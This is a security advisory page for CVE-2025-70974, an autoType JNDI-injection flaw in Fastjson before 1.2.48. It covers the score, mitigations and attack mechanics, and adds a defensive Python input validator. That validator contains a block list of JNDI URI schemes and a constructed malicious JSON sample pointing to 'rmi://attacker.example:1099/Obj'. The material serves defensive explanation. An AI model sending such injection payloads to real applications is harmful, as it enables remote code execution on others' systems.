CVE-2025-70974
Published: 09 January 2026
Summary
CVE-2025-70974 is a critical-severity Inclusion of Functionality from Untrusted Control Sphere (CWE-829) vulnerability in the Fastjson Java library, affecting versions before 1.2.48. Its CVSS base score is 10.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). It is ranked at the 10th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and SI-2 (Flaw Remediation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
SI-2 (Flaw Remediation) directly addresses CVE-2025-70974 by requiring timely patching of Fastjson to version 1.2.48 or later, which closes the autoType mishandling that enables JNDI injection. Because a later bypass is tracked separately as CVE-2022-25845, remediation should move to the current Fastjson release rather than stopping at 1.2.48.
CM-6 (Configuration Settings) enforces a secure Fastjson parser configuration, such as disabling autoType outright or restricting it to an explicit class whitelist, so that a malicious @type key in JSON input cannot select an arbitrary class.
SI-10 (Information Input Validation) rejects JSON input that carries unexpected @type class names or embedded JNDI lookup targets before the document reaches the Fastjson deserializer.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
T1190 applies because the flaw gives an unauthenticated remote attacker code execution simply by submitting crafted JSON to a public-facing application that parses it with a vulnerable Fastjson version (autoType class selection followed by a JNDI lookup).
NVD Description
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
Deeper analysis
CVE-2025-70974 is a critical vulnerability in the Fastjson Java library versions prior to 1.2.48, stemming from improper handling of the autoType feature. Specifically, when a JSON document contains an @type key whose value specifies the name of a Java class, Fastjson may invoke certain public methods on that class. Depending on those methods' behavior, this can enable JNDI injection using an attacker-supplied payload embedded elsewhere in the same JSON document. The flaw represents an incomplete fix for CVE-2017-18349, with a related bypass addressed in CVE-2022-25845. It carries a CVSS v3.1 base score of 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) and is associated with CWE-829 (Inclusion of Functionality from Untrusted Control Sphere).
The vulnerability can be exploited by unauthenticated remote attackers who supply malicious JSON input to applications parsing it with vulnerable Fastjson versions. The attacker sets the @type field to the name of a Java class whose public methods (invoked by Fastjson while populating the object) perform a JNDI lookup, and places the lookup target, for example an LDAP or RMI URL under attacker control, in another value of the same document. The resulting JNDI resolution yields remote code execution (RCE), potentially leading to full system compromise with high impacts on confidentiality, integrity, and availability across the affected scope.
Advisories and patch notes recommend upgrading to Fastjson 1.2.48 or later, as evidenced by the official changelog comparing versions 1.2.47 and 1.2.48 on GitHub. Additional resources, including exploitation proofs on Vulhub and Chinese advisories like CNVD-2019-22238, highlight disabling autoType or using whitelisting as interim measures where upgrading is not feasible.
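As an added example (not code from this page or from the Fastjson project), the following Python implements the pre-deserialization gate that the Mitigating Controls section (SI-10, input validation) and the interim measures above describe. It parses the input with a plain JSON parser that has no class-resolution feature, rejects any @type value outside an allowlist, and rejects any string that carries a JNDI URI scheme, walking nested objects and arrays because Fastjson honours @type at any depth. The allowlist prefix com.example.dto., the class names in the sample documents and the sample documents themselves are constructed for this example.

```python
import json
from typing import Any, Iterator

# Class-name prefixes the application legitimately deserializes via @type.
# Hypothetical value for this example; a real deployment lists its own DTO packages.
ALLOWED_TYPE_PREFIXES = ("com.example.dto.",)

# URI schemes a JNDI lookup can resolve. Ordinary business JSON has no reason
# to carry one, so any occurrence is treated as an injection attempt.
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://", "dns://")


def _walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any, Any]]:
    """Yield (json_path, key, value) for every object member and array element, depth-first."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            yield (child, key, value)
            yield from _walk(value, child)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            child = f"{path}[{index}]"
            yield (child, None, value)
            yield from _walk(value, child)


def find_violations(document: Any) -> list[str]:
    """Return the reasons a parsed JSON document must not reach an autoType-enabled parser."""
    violations: list[str] = []
    for path, key, value in _walk(document):
        # Any @type whose value is not an allowlisted class name is rejected,
        # regardless of how deep in the document it appears.
        if key == "@type":
            if not isinstance(value, str) or not value.startswith(ALLOWED_TYPE_PREFIXES):
                violations.append(f"{path}: @type {value!r} is not in the class allowlist")
        # A JNDI target can sit in any string field, not only next to the @type key.
        if isinstance(value, str) and any(s in value.lower() for s in JNDI_SCHEMES):
            violations.append(f"{path}: value looks like a JNDI lookup target: {value!r}")
    return violations


def validate_json_input(raw: str) -> tuple[bool, list[str]]:
    """Parse raw JSON with the standard library (no class resolution) and report whether
    the document may be handed on to the application's deserializer."""
    try:
        document = json.loads(raw)
    except json.JSONDecodeError as exc:
        return False, [f"malformed JSON: {exc.msg}"]
    violations = find_violations(document)
    return (not violations), violations


# Constructed sample inputs for this example; neither is real traffic or a working exploit.
BENIGN = '{"@type": "com.example.dto.Order", "id": 42, "items": [{"sku": "A1", "qty": 2}]}'
MALICIOUS = (
    '{"@type": "com.example.Unsafe",'
    ' "config": {"target": "rmi://attacker.example:1099/Obj"},'
    ' "items": [{"@type": "org.example.legacy.Bean"}]}'
)

if __name__ == "__main__":
    for label, payload in (("benign", BENIGN), ("malicious", MALICIOUS)):
        accepted, reasons = validate_json_input(payload)
        print(f"{label}: {'accepted' if accepted else 'rejected'}")
        for reason in reasons:
            print(f"  - {reason}")
```

This gate belongs in front of the deserializer as defense in depth, not in place of upgrading: Fastjson has had allowlist bypasses of its own (the NVD note references CVE-2022-25845), so the same allowlist must also be enforced in the parser configuration and the library kept at a current release.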
This issue saw real-world exploitation from 2023 through 2025, including campaigns by actors like Androxgh0st, who compromised a US university to host C2 infrastructure, per CloudSEK analysis.
Details
- CWE(s)